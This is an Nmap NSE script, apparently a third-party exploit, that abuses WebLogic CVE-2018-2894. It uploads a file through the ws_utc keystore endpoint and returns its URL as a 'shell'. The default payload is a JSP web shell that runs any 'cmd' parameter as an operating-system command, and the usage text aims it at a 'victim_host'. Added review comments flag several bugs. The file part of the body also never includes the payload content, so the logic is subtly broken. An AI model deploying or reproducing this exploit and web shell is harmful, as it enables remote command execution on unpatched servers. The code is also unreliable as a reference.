local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"

-- NOTE(review): the usage example inside this description targets port 443,
-- but the portrule below only matches port number 7001.
description = [[ Weblogic CVE-2018-2894 $ git clone https://github.com/Rvn0xsy/nse_vuln.git $ cd /nse_vuln/ $ sudo cp * /usr/share/nmap/scripts/ $ sudo nmap -n -p 443 --script weblogic-cve-2018-2894.nse victim_host ]]

---
-- @usage
-- nmap -sV --script weblogic-cve-2018-2894 -p 7001
-- nmap -sV --script weblogic-cve-2018-2894
--   --script-args 'weblogic-cve-2018-2894.uri=/,test.jsp,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' -p 7001
--
-- @output
-- PORT     STATE SERVICE
-- 7001/tcp open  afs3-callback
-- | weblogic-upload:
-- |_  url: /ws_utc/config/keystore/1532325925_Nmap.jsp
-- MAC Address: 02:42:AC:13:00:02 (Unknown)
--
-- Observable on the target (useful for detection): one multipart POST to
-- <uri>ws_utc/resources/setting/keystore?timestamp=<epoch> and, when the
-- server answers 200, a file reported under
-- <uri>ws_utc/config/keystore/<epoch>_<filename>.
--
-- @args weblogic-cve-2018-2894.uri base path prepended to the request path. Default /
-- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded
-- @args weblogic-cve-2018-2894.content file's contents
-- Other useful arguments when using this script are:
-- * http.useragent = String - User Agent used in HTTP requests

author = "Rvn0xsy "
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit"}

--- Port rule: runs only when the port number is exactly 7001.
-- The service name and protocol are not consulted, so a WebLogic instance
-- on another port is skipped and a non-WebLogic service on 7001 is probed.
-- @param host host table (unused)
-- @param port port table; only port.number is read
-- @treturn boolean
portrule = function(host,port)
  if(port.number == 7001)then
    return true
  end
  return false
end

--- Serialise plain form fields as multipart/form-data parts.
-- Each field becomes a Content-Disposition block followed by the value and
-- a "--<boundary>" separator. Field order follows pairs(), so the order of
-- parts in the request body is unspecified.
-- @param form table of field name -> value
-- @param boundary multipart boundary string (without the leading "--")
-- @treturn string the encoded parts, starting with CRLF
add_formData = function(form,boundary)
  local contents = "\r\n"
  for key,value in pairs(form) do
    contents = string.format("%sContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n",contents,key,value,boundary)
  end
  -- return contents.."--\r\n"  -- (commented out by the author; the closing
  -- boundary marker is emitted by add_fileData instead)
  return contents
end

--- Build the headers of the file part and close the multipart body.
-- Emits the Content-Disposition line with the field and file names, a
-- text/plain Content-Type, and the terminating "--<boundary>--" marker.
-- @param file table with fields "name" and "filename"
-- @param boundary multipart boundary string (without the leading "--")
-- @treturn string
add_fileData = function(file,boundary)
  return string.format("Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\nContent-Type: text/plain\r\n\r\n--%s--\r\n",file["name"],file["filename"],boundary)
end

--- Script action: sends the multipart POST and reports the resulting path.
-- NOTE(review): form, file, shell, time, uri, boundary, ks_name, filename,
-- post_url, options and resp are all assigned without `local` and therefore
-- leak into the global environment; ks_name is never read afterwards.
-- @param host host table passed to http.post
-- @param port port table passed to http.post
-- @return a table with field "url" when the server answers HTTP 200,
--   otherwise false
action = function(host,port)
  form = {}
  file = {}
  shell = {}
  form["ks_name"] = "Exploit CVE-2018-2894"
  form["ks_edit_mode"] = "false"
  form["ks_password_front"] = "123456"
  form["ks_password"] = "123456"
  form["ks_password_changed"] = "true"
  file["name"]="ks_filename"
  file["filename"] = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp"
  file["content"] = stdnse.get_script_args('weblogic-cve-2018-2894.content') or "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>"
  time = os.time()
  -- NOTE(review): reads the `.filename` script arg here, while the @args block
  -- above documents a `.uri` arg for this value -- confirm which is intended.
  uri = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "/"
  boundary = "-ABC"
  ks_name = "Exploit CVE-2018-2894"
  filename = time.."_"..file["filename"]
  -- The timestamp query parameter is a second os.time() call, so it can
  -- differ from `time` (used in filename) by a second.
  post_url = uri .. "ws_utc/resources/setting/keystore?timestamp="..os.time()
  options = {}
  options.header = {}
  -- Body layout: "--<boundary>", the form fields, then the file part, which
  -- also supplies the closing boundary marker.
  options.content = "\r\n--"..boundary
  options.header['Content-Type'] = "multipart/form-data; boundary="..boundary
  options.content = options.content .. add_formData(form,boundary)
  options.content = options.content .. add_fileData(file,boundary)
  -- NOTE(review): resp is indexed without a nil check -- confirm http.post
  -- never returns nil on connection failure in this nmap version.
  resp = http.post(host,port,post_url,options,nil,nil)
  if(resp.status == 200)then
    -- Only the status code is checked; the response body is not inspected,
    -- so a 200 from an unrelated handler is reported as success.
    shell["url"] = uri .. "ws_utc/config/keystore/"..filename
    return shell
  end
  return false
end